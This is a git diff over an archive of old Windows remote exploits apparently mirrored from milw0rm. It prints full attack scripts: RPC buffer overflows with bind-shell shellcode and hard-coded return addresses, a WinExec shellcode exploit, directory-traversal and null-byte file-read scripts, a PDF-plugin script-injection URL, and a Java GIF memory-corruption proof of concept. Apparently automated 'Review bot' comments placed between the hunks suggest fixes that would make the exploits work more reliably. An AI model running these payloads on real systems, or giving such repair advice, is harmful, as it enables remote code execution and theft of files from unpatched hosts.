+ query1 += "\x00\x00\x00\x00"
+
+ #NetrJoinDomain2 data: Domain/Hostname
+
+ targetd = '\x00'.join(list(domain)) + '\x00'
+ Len = baselen + len(domain)
+ query2 = struct.pack('L', Len)
+ query2 += struct.pack('L', 0)
+ query2 += struct.pack('L', Len)
+ query2 += targetd
+
+ query3 = "\x5C\x00\x5C\x00\x76\x00\x90\x90"
+ query3 += "\x90\x90" * 1058
+ query3 += "\xEB\x06" #6 byte jump from current pointer in ebx
+ query3 += "\x27\x16\xE1\x77" #Address from user32.dll (0x77E11627)
+ #350 byte port binding shellcode
+ query3 += "\x90\x90\x90\x90\x90\x90"
+ query3 += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
+ query3 += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83"
+ query3 += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2"
+ query3 += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87"
+ query3 += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98"
+ query3 += "\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91"
+ query3 += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75"
+ query3 += "\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
+ query3 += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57"
+ query3 += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc"
+ query3 += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0"
+ query3 += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7"
+ query3 += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a"
+ query3 += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4"
+ query3 += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4"
+ query3 += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
+ query3 += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f"
+ query3 += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3"
+ query3 += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68"
+ query3 += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65"
+ query3 += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e"
+ query3 += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63"
+ query3 += "\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e"
+ query3 += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
+ query3 += "\xba\xa6\xf5\x31\x39\x59\x23\xce";
+ query3 += "\x90\x90" * 2467
+ query3 += "\x00\x00"
+
+ query3 += "\x00\x00\x00\x00"
+ query3 += "\x00\x00\x00\x00"
+ query3 += "\x00\x00\x00\x00"
+ query3 += "\x00\x00"
+ query3 += "\x01\x00\x00\x00"
+
+ query = query1 + query2 + query3
+ dce.call(0x16, query)
+
+if __name__ == '__main__':
+ try:
+ target = sys.argv[1]
+ domain = sys.argv[2]
+ except IndexError:
+ print 'Usage: %s ' % sys.argv[0]
+ sys.exit(-1)
+
+ DCEconnectAndExploit(target, domain)
+
+# milw0rm.com [2006-11-18]
diff --git a/platforms/windows/remote/2866.html b/platforms/windows/remote/2866.html
index 91e2c1b4e..3af8d7542 100755
--- a/platforms/windows/remote/2866.html
+++ b/platforms/windows/remote/2866.html
@@ -1,17 +1,17 @@
-
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2006-11-30]
+
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2006-11-30]
diff --git a/platforms/windows/remote/293.c b/platforms/windows/remote/293.c
index 6f07141ca..a32eda979 100755
--- a/platforms/windows/remote/293.c
+++ b/platforms/windows/remote/293.c
@@ -195,6 +195,6 @@ WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE); FreeLibrary(hNetapi); return 0;
-}
-
-// milw0rm.com [2004-04-24]
+}
+
+// milw0rm.com [2004-04-24]
diff --git a/platforms/windows/remote/295.c b/platforms/windows/remote/295.c
index d631ce749..a65e3fb4a 100755
--- a/platforms/windows/remote/295.c
+++ b/platforms/windows/remote/295.c
@@ -518,6 +518,6 @@ printf("OK\n"); len = recv(sockfd, recvbuf, 1600, 0); return 0;
-}
-
-// milw0rm.com [2004-04-29]
+}
+
+// milw0rm.com [2004-04-29]
diff --git a/platforms/windows/remote/297.c b/platforms/windows/remote/297.c
index 37ae1dbff..6d4f62e1b 100755
--- a/platforms/windows/remote/297.c
+++ b/platforms/windows/remote/297.c
@@ -308,6 +308,6 @@ if (pid) wait(&pid); exit(0); }
-
-
-// milw0rm.com [2004-05-16]
+
+
+// milw0rm.com [2004-05-16]
diff --git a/platforms/windows/remote/2974.pl b/platforms/windows/remote/2974.pl
index e2009eaa8..875e9ff0d 100755
--- a/platforms/windows/remote/2974.pl
+++ b/platforms/windows/remote/2974.pl
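Review bot: The three length fields in `query2` are packed with `struct.pack('L', ...)`, which uses the host's native size and byte order, so on an LP64 Python build each field becomes 8 bytes instead of the 4-byte little-endian fields that `query1` is built from by hand, shifting everything in `query3` (including the `\xEB\x06` jump and the `0x77E11627` return address) by 12 bytes; use `query2 = struct.pack('<L', Len)`, `query2 += struct.pack('<L', 0)`, `query2 += struct.pack('<L', Len)`. `targetd = '\x00'.join(list(domain)) + '\x00'` and the `Len = baselen + len(domain)` arithmetic assume one byte per character of `domain`, which should be stated in a comment or enforced on the input. `import socket` is unused. The return address is tied to the user32.dll build of the "windows 2000 server SP4" target named in the header, which is worth repeating next to the `query3 +=` line that embeds it.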
@@ -1,21 +1,21 @@
-# Http explorer Web Server 1.02 Directory Transversal Vulnerability
-# http://sourceforge.net/projects/http-explorer/
-# Test: http://[site]/../../../../ || http://[site]/../
-# /str0ke
-
-use LWP::Simple;
-use strict;
-
-sub usage
-{
- print "Http explorer Web Server 1.02 Directory Transversal Vulnerability\n";
- print "str0ke (milw0rm.com)\n";
- print "Usage: $0 www.example.com\n";
- exit ();
-}
-
-my $host= shift || &usage;
-
-getprint "http://" . $host . "/../../../../../../../../boot.ini";
-
-# milw0rm.com [2006-12-21]
+# Http explorer Web Server 1.02 Directory Transversal Vulnerability
+# http://sourceforge.net/projects/http-explorer/
+# Test: http://[site]/../../../../ || http://[site]/../
+# /str0ke
+
+use LWP::Simple;
+use strict;
+
+sub usage
+{
+ print "Http explorer Web Server 1.02 Directory Transversal Vulnerability\n";
+ print "str0ke (milw0rm.com)\n";
+ print "Usage: $0 www.example.com\n";
+ exit ();
+}
+
+my $host= shift || &usage;
+
+getprint "http://" . $host . "/../../../../../../../../boot.ini";
+
+# milw0rm.com [2006-12-21]
diff --git a/platforms/windows/remote/3037.php b/platforms/windows/remote/3037.php
index 5b61c3a75..0004e66ed 100755
--- a/platforms/windows/remote/3037.php
+++ b/platforms/windows/remote/3037.php
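Review bot: The HTTP status returned by `getprint` is discarded, so a 404 or an error page is printed exactly like a successful read of `boot.ini` and the operator cannot tell whether the traversal worked; capture it, e.g. `my $rc = getprint("http://" . $host . "/../../../../../../../../boot.ini");` followed by `print "HTTP status: $rc\n";`. The title and usage strings say "Transversal" where the usual term is "Traversal"; that is a runtime string, so it is the author's call, but it makes the advisory harder to find. `&usage` is only reached when no argument is given at all, so anything else in `$host` (including a path) goes into the URL unchecked.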
@@ -1,84 +1,84 @@
- http://sourceforge.net/projects/durian/
-
-*/
-
-error_reporting(E_ALL);
-$address = "192.168.1.3";
-$service_port = "4002";
-
-$shellcode =
-"\xeb\x1b".
-"\x5b".
-"\x31\xc0".
-"\x50".
-"\x31\xc0".
-"\x88\x43\x59".
-"\x53".
-"\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d
-"\xff\xd3".
-"\x31\xc0".
-"\x50".
-"\xbb\xda\xcd\x81\x7c". //ExitProcess, 0x7c81cdda
-"\xff\xd3".
-"\xe8\xe0\xff\xff\xff".
-"\x63\x6d\x64".
-"\x2e".
-"\x65".
-"\x78\x65".
-"\x20\x2f".
-"\x63\x20".
-"cmd.exe /c start notepad & ";
-
-//$eip="\x72\xe0\xf1\x00";//DEP disabled
-$eip="\x72\xe0\xf2\x00";
-
-$ch =array("\xaa","\xa0","\x41");
-$size=array(30,70,150,330,520,700,1400,2300);
-
- for ($j=0; $j
-
-# milw0rm.com [2006-12-29]
+ http://sourceforge.net/projects/durian/
+
+*/
+
+error_reporting(E_ALL);
+$address = "192.168.1.3";
+$service_port = "4002";
+
+$shellcode =
+"\xeb\x1b".
+"\x5b".
+"\x31\xc0".
+"\x50".
+"\x31\xc0".
+"\x88\x43\x59".
+"\x53".
+"\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d
+"\xff\xd3".
+"\x31\xc0".
+"\x50".
+"\xbb\xda\xcd\x81\x7c". //ExitProcess, 0x7c81cdda
+"\xff\xd3".
+"\xe8\xe0\xff\xff\xff".
+"\x63\x6d\x64".
+"\x2e".
+"\x65".
+"\x78\x65".
+"\x20\x2f".
+"\x63\x20".
+"cmd.exe /c start notepad & ";
+
+//$eip="\x72\xe0\xf1\x00";//DEP disabled
+$eip="\x72\xe0\xf2\x00";
+
+$ch =array("\xaa","\xa0","\x41");
+$size=array(30,70,150,330,520,700,1400,2300);
+
+ for ($j=0; $j
+
+# milw0rm.com [2006-12-29]
diff --git a/platforms/windows/remote/3055.html b/platforms/windows/remote/3055.html
index fcd1c6aeb..29e51cb31 100755
--- a/platforms/windows/remote/3055.html
+++ b/platforms/windows/remote/3055.html
@@ -1,55 +1,55 @@
-
-
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2006-12-31]
+
+
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2006-12-31]
diff --git a/platforms/windows/remote/3058.html b/platforms/windows/remote/3058.html
index 28f763908..849ce4779 100755
--- a/platforms/windows/remote/3058.html
+++ b/platforms/windows/remote/3058.html
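Review bot: The shellcode calls `WinExec` and `ExitProcess` through absolute addresses (`0x7c86136d`, `0x7c81cdda`, per the inline comments) and `$eip` is a third absolute address, but nothing in the file records which Windows build and DLL version they were taken from, so the two `//WinExec` / `//ExitProcess` comments should name the library version (kernel32.dll for those two exports) and the `$eip` line the module it points into, otherwise the target the exploit was tested against cannot be reconstructed. The listing is also cut off at `for ($j=0; $j` — the loop body and whatever connects to `$address:$service_port` are not in the hunk, which looks like the page's HTML stripping rather than the committed file, so the send path cannot be reviewed here. The old and new sides of the hunk are identical, consistent with a line-ending-only change.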
@@ -1,49 +1,49 @@ - - - - - - - - - - - - - -# milw0rm.com [2006-12-31] + + + + + + + + + + + + + +# milw0rm.com [2006-12-31] diff --git a/platforms/windows/remote/3063.pl b/platforms/windows/remote/3063.pl index 1c79d92ad..fececd86a 100755 --- a/platforms/windows/remote/3063.pl +++ b/platforms/windows/remote/3063.pl @@ -1,20 +1,20 @@ -#!perl -#found by Bl0od3r -#visit http://dc3.dl.am -#download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796 -#developer:http://www.fersch.de/formbankserver/ -use LWP::Simple; -sub usage -{ -die("file.pl host.com /../file.txt"); -} -$host= $ARGV[0]; -$file= $ARGV[1]; -if (!$host) { -die("No Host."); -} ; if (!$file) { -die("No File."); -} -getprint "http://".$host ."/cgi-bin/formbankcgi.exe/AbfrageForm?Name=".$ARGV[1]."%00"; - -# milw0rm.com [2007-01-01] +#!perl +#found by Bl0od3r +#visit http://dc3.dl.am +#download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796 +#developer:http://www.fersch.de/formbankserver/ +use LWP::Simple; +sub usage +{ +die("file.pl host.com /../file.txt"); +} +$host= $ARGV[0]; +$file= $ARGV[1]; +if (!$host) { +die("No Host."); +} ; if (!$file) { +die("No File."); +} +getprint "http://".$host ."/cgi-bin/formbankcgi.exe/AbfrageForm?Name=".$ARGV[1]."%00"; + +# milw0rm.com [2007-01-01] diff --git a/platforms/windows/remote/3084.txt b/platforms/windows/remote/3084.txt index bcf17609f..bbe7721a5 100755 --- a/platforms/windows/remote/3084.txt +++ b/platforms/windows/remote/3084.txt 
@@ -1,12 +1,12 @@ -# Stefano Di Paola -# http://www.wisec.it/ - -From Secunia: -Input passed to a hosted PDF file is not properly sanitised by the browser plug-in -before being returned to users. This can be exploited to execute arbitrary script code in -a user's browser session in context of an affected site. - -Example: -- http://[host]/[filename].pdf#[some text]=javascript:[code] - -# milw0rm.com [2007-01-05] +# Stefano Di Paola +# http://www.wisec.it/ + +From Secunia: +Input passed to a hosted PDF file is not properly sanitised by the browser plug-in +before being returned to users. This can be exploited to execute arbitrary script code in +a user's browser session in context of an affected site. + +Example: +- http://[host]/[filename].pdf#[some text]=javascript:[code] + +# milw0rm.com [2007-01-05] diff --git a/platforms/windows/remote/3086.py b/platforms/windows/remote/3086.py index ed98fd758..9307d57b3 100755 --- a/platforms/windows/remote/3086.py +++ b/platforms/windows/remote/3086.py 
@@ -1,89 +1,89 @@ -#!/usr/bin/python -# Remote exploit for buffer overflow vulnerability in CA BrightStor Arcserve -# tapeeng.exe service. Tested on windows 2000 SP4. Binds shell to TCP port 4443 -# -# Winny M Thomas ;-) -# Author shall bear no responsibility for any screw ups caused by using this code - - -from impacket.dcerpc import transport, dcerpc -from impacket import uuid -import sys - -def EnableDetailLogging(target): - trans = transport.TCPTransport(target, 6502) - #On some linux systems the following call to connect may fail due to - #no support of settimeout in socket module. Comment out that line in - #transport.py of impacket and run this script - - try: - trans.connect() - except: - print 'Could not connect to target port; Target may not be running tapeeng' - sys.exit(-1) - - dce = dcerpc.DCERPC_v5(trans) - dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0'))) - - #RPC request to enable detail logging - request = '\x00\x04\x08\x0c' - request += '\x02\x00\x00\x00' - request += '\x00\x00\x00\x00' - request += '\x00\x00\x00\x00' - request += '\x00\x00\x00\x00' - - dce.call(43, request) - -def DCEconnectAndExploit(target): - trans = transport.TCPTransport(target, 6502) - trans.connect() - dce = dcerpc.DCERPC_v5(trans) - dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0'))) - - request = '\x10\x09\xf9\x77' - request += '\x41'*1130 - request += '\x90\x90\x90\x90\xeb\x08' #short jump into nops - request += '\xd2\x7b\x57\x7c' #call ebx address from kernel32.dll - request += '\x90' * 32 - #Shellcode to bind shell to TCP port 3334 - request += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73" - request += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83" - request += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2" - request += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87" - request += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98" - request += 
"\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91" - request += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75" - request += "\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45" - request += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57" - request += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc" - request += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0" - request += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7" - request += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a" - request += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4" - request += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4" - request += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87" - request += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f" - request += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3" - request += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68" - request += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65" - request += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e" - request += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63" - request += "\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e" - request += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91" - request += "\xba\xa6\xf5\x31\x39\x59\x23\xce" - - dce.call(38, request) - -if __name__ == '__main__': - try: - target = sys.argv[1] - except IndexError: - print 'Usage: %s \n' % sys.argv[0] - sys.exit(-1) - - EnableDetailLogging(target) - DCEconnectAndExploit(target) - - print 'Exploit complete; Now telnet to port 4443 on target' - -# milw0rm.com [2007-01-05] +#!/usr/bin/python +# Remote exploit for buffer overflow vulnerability in CA BrightStor Arcserve +# tapeeng.exe service. Tested on windows 2000 SP4. 
Binds shell to TCP port 4443 +# +# Winny M Thomas ;-) +# Author shall bear no responsibility for any screw ups caused by using this code + + +from impacket.dcerpc import transport, dcerpc +from impacket import uuid +import sys + +def EnableDetailLogging(target): + trans = transport.TCPTransport(target, 6502) + #On some linux systems the following call to connect may fail due to + #no support of settimeout in socket module. Comment out that line in + #transport.py of impacket and run this script + + try: + trans.connect() + except: + print 'Could not connect to target port; Target may not be running tapeeng' + sys.exit(-1) + + dce = dcerpc.DCERPC_v5(trans) + dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0'))) + + #RPC request to enable detail logging + request = '\x00\x04\x08\x0c' + request += '\x02\x00\x00\x00' + request += '\x00\x00\x00\x00' + request += '\x00\x00\x00\x00' + request += '\x00\x00\x00\x00' + + dce.call(43, request) + +def DCEconnectAndExploit(target): + trans = transport.TCPTransport(target, 6502) + trans.connect() + dce = dcerpc.DCERPC_v5(trans) + dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0'))) + + request = '\x10\x09\xf9\x77' + request += '\x41'*1130 + request += '\x90\x90\x90\x90\xeb\x08' #short jump into nops + request += '\xd2\x7b\x57\x7c' #call ebx address from kernel32.dll + request += '\x90' * 32 + #Shellcode to bind shell to TCP port 3334 + request += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73" + request += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83" + request += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2" + request += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87" + request += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98" + request += "\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91" + request += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75" + request += 
"\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45" + request += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57" + request += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc" + request += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0" + request += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7" + request += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a" + request += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4" + request += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4" + request += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87" + request += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f" + request += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3" + request += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68" + request += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65" + request += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e" + request += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63" + request += "\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e" + request += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91" + request += "\xba\xa6\xf5\x31\x39\x59\x23\xce" + + dce.call(38, request) + +if __name__ == '__main__': + try: + target = sys.argv[1] + except IndexError: + print 'Usage: %s \n' % sys.argv[0] + sys.exit(-1) + + EnableDetailLogging(target) + DCEconnectAndExploit(target) + + print 'Exploit complete; Now telnet to port 4443 on target' + +# milw0rm.com [2007-01-05] diff --git a/platforms/windows/remote/310.txt b/platforms/windows/remote/310.txt index ffc5abc80..2d6ae66a4 100755 --- a/platforms/windows/remote/310.txt +++ b/platforms/windows/remote/310.txt @@ -56,6 +56,6 @@ setTimeout("injectIt()", 1000); response.setStatus(302); response.setHeader("Location", "URL:res://shdoclc.dll/HTTP_501.htm"); %> - - -# milw0rm.com [2004-07-09] + + +# milw0rm.com [2004-07-09] 
diff --git a/platforms/windows/remote/313.txt b/platforms/windows/remote/313.txt index 92c6b0d21..5da436b3c 100755 --- a/platforms/windows/remote/313.txt +++ b/platforms/windows/remote/313.txt @@ -8,6 +8,6 @@ Example: height="100%" border=3>
    Click this link: The Better Browser - -# milw0rm.com [2004-07-13] + );parent.setTimeout('showalert()',3000);">The Better Browser + +# milw0rm.com [2004-07-13] diff --git a/platforms/windows/remote/315.txt b/platforms/windows/remote/315.txt index b30829297..8066e0b23 100755 --- a/platforms/windows/remote/315.txt +++ b/platforms/windows/remote/315.txt @@ -8,6 +8,6 @@ Content-Type:text/html click here to test - - -# milw0rm.com [2004-07-13] + + +# milw0rm.com [2004-07-13] diff --git a/platforms/windows/remote/316.txt b/platforms/windows/remote/316.txt index c80c0b9ac..d3cb91ba0 100755 --- a/platforms/windows/remote/316.txt +++ b/platforms/windows/remote/316.txt @@ -69,6 +69,6 @@ Response.Status = "302 Found" Response.AddHeader "Content-Length", "4" Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm" %> - - -# milw0rm.com [2004-07-13] + + +# milw0rm.com [2004-07-13] diff --git a/platforms/windows/remote/3168.java b/platforms/windows/remote/3168.java index 392934c21..fa4b19230 100755 --- a/platforms/windows/remote/3168.java +++ b/platforms/windows/remote/3168.java 
@@ -1,280 +1,280 @@ -/* -* -* FileName: JvmGifVulPoc.java -* -* Date: 2007-01-21 -* -* Description: Sun Microsystems Java GIF File Parsing Memory Corruption Vulnerability Prove Of Concept Exploit -* -* Environment: Only successfully tested on Sun Jre 1.5 -* -* Author: luoluo -* -* Contact: luoluonet_at_hotmail.com || luoluonet_at_126.com || luoluonet_at_yahoo.com -* -* Team: PST(Ph4nt0m Security Team, http://www.ph4nt0m.org) from P.R.C. -* -* Thanks YunShu very much, he helps to find a simple way to modify the width of image block. -* Thanks all friends from ph4nt0m secutiry team, espacially Axis SuperHei Onlyu Nop EnvyMask CoCo OYXin Mix and etc. -* Best wishes to the newly married couple TomyChen and his wife! -* -* -*/ - -import java.io.*; -import java.applet.*; -import javax.imageio.*; -import java.util.*; -import java.awt.*; - -public class JvmGifVulPoc extends Applet { - private Image image = null; - byte[] imageBytes = new byte[] - { - (byte)0x47, (byte)0x49, (byte)0x46, (byte)0x38, (byte)0x39, (byte)0x61, (byte)0x96, (byte)0x00, (byte)0x8c, (byte)0x00, (byte)0xe6, (byte)0x00, (byte)0x00, (byte)0x2d, (byte)0x20, (byte)0x21, - (byte)0x4a, (byte)0x6c, (byte)0xbd, (byte)0x49, (byte)0x5b, (byte)0x91, (byte)0x7b, (byte)0x88, (byte)0xc4, (byte)0x69, (byte)0x59, (byte)0x51, (byte)0x6d, (byte)0x71, (byte)0x8e, (byte)0x5b, - (byte)0x4b, (byte)0x39, (byte)0x7b, (byte)0x63, (byte)0x59, (byte)0xb8, (byte)0xaa, (byte)0x97, (byte)0xfe, (byte)0xf8, (byte)0xec, (byte)0x26, (byte)0x26, (byte)0x41, (byte)0x4b, (byte)0x47, - (byte)0x58, (byte)0x4a, (byte)0x6c, (byte)0xb3, (byte)0x91, (byte)0x7b, (byte)0x6f, (byte)0xf4, (byte)0xe7, (byte)0xda, (byte)0xa9, (byte)0x95, (byte)0x8c, (byte)0x60, (byte)0x5b, (byte)0x64, - (byte)0x52, (byte)0x3f, (byte)0x3a, (byte)0xea, (byte)0xd7, (byte)0xc6, (byte)0x45, (byte)0x4b, (byte)0x63, (byte)0x49, (byte)0x33, (byte)0x2e, (byte)0x3e, (byte)0x39, (byte)0x4e, (byte)0x5f, - (byte)0x6a, (byte)0x92, (byte)0x74, (byte)0x64, (byte)0x63, (byte)0xde, 
(byte)0xc8, (byte)0xbd, (byte)0xd4, (byte)0xb5, (byte)0xa3, (byte)0xa4, (byte)0x82, (byte)0x71, (byte)0x61, (byte)0x4b, - (byte)0x3b, (byte)0x7d, (byte)0x6c, (byte)0x6a, (byte)0x99, (byte)0x99, (byte)0x99, (byte)0x40, (byte)0x2c, (byte)0x28, (byte)0x52, (byte)0x6a, (byte)0xbe, (byte)0x52, (byte)0x5b, (byte)0x81, - (byte)0x76, (byte)0x7a, (byte)0x96, (byte)0x4a, (byte)0x3c, (byte)0x3a, (byte)0x52, (byte)0x6b, (byte)0xb5, (byte)0x33, (byte)0x33, (byte)0x66, (byte)0x50, (byte)0x6b, (byte)0xaf, (byte)0xbf, - (byte)0xc2, (byte)0xde, (byte)0x58, (byte)0x66, (byte)0x9b, (byte)0x72, (byte)0x5c, (byte)0x54, (byte)0x63, (byte)0x52, (byte)0x53, (byte)0x42, (byte)0x4f, (byte)0x7a, (byte)0xa6, (byte)0x9c, - (byte)0xa2, (byte)0x33, (byte)0x28, (byte)0x33, (byte)0xff, (byte)0xff, (byte)0xff, (byte)0xa4, (byte)0x8d, (byte)0x84, (byte)0xe3, (byte)0xbf, (byte)0xa5, (byte)0x43, (byte)0x32, (byte)0x3a, - (byte)0x54, (byte)0x30, (byte)0x2d, (byte)0x53, (byte)0x4a, (byte)0x4b, (byte)0x8c, (byte)0x81, (byte)0x8c, (byte)0x85, (byte)0x73, (byte)0x6c, (byte)0x85, (byte)0x6a, (byte)0x61, (byte)0x58, - (byte)0x6c, (byte)0xa6, (byte)0x63, (byte)0x52, (byte)0x4a, (byte)0x87, (byte)0x7b, (byte)0x7f, (byte)0xf6, (byte)0xee, (byte)0xe7, (byte)0x5c, (byte)0x60, (byte)0x7e, (byte)0xb6, (byte)0xb6, - (byte)0xd1, (byte)0x5a, (byte)0x51, (byte)0x54, (byte)0x62, (byte)0x58, (byte)0x5a, (byte)0x72, (byte)0x66, (byte)0x6b, (byte)0x53, (byte)0x73, (byte)0xb6, (byte)0x37, (byte)0x2a, (byte)0x26, - (byte)0xc9, (byte)0xa5, (byte)0x8e, (byte)0x47, (byte)0x43, (byte)0x4d, (byte)0x3b, (byte)0x37, (byte)0x3b, (byte)0x89, (byte)0x8c, (byte)0xa6, (byte)0x51, (byte)0x60, (byte)0x8f, (byte)0xd4, - (byte)0xd6, (byte)0xdc, (byte)0x55, (byte)0x43, (byte)0x44, (byte)0x4b, (byte)0x6b, (byte)0xc4, (byte)0x67, (byte)0x72, (byte)0x9d, (byte)0x55, (byte)0x51, (byte)0x68, (byte)0x55, (byte)0x73, - (byte)0xbd, (byte)0x40, (byte)0x44, (byte)0x60, (byte)0x8c, (byte)0x71, (byte)0x6f, (byte)0xb7, (byte)0x9c, (byte)0x8e, (byte)0xfe, 
